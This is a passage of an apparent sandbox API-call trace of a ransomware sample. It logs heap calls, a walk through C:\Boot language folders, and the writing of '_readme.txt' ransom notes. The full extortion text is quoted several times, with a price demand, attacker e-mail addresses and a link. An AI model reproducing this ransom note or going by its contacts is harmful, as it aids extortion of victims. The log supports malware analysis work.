(HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.095] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0180.095] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0180.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.095] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.095] PathFindFileNameW (pszPath="") returned="" [0180.095] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0180.096] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0180.096] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0180.096] FreeLibrary (hLibModule=0x759a0000) returned 1 [0180.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.096] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0180.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.096] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 0 [0180.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0180.098] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0180.098] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0180.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0180.098] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\_readme.txt" (normalized: "c:\\boot\\fr-fr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0180.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0180.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.099] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*" (normalized: "c:\\boot\\fr-fr\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.100] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.100] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0180.100] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0180.100] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0180.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0180.101] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.114] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0180.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.114] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0180.114] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.114] PathFindFileNameW (pszPath="") returned="" [0180.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.114] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0180.115] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0180.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0180.115] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0180.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0180.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.115] FreeLibrary (hLibModule=0x759a0000) returned 1 [0180.115] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0180.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.115] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 0 [0180.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0180.115] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your 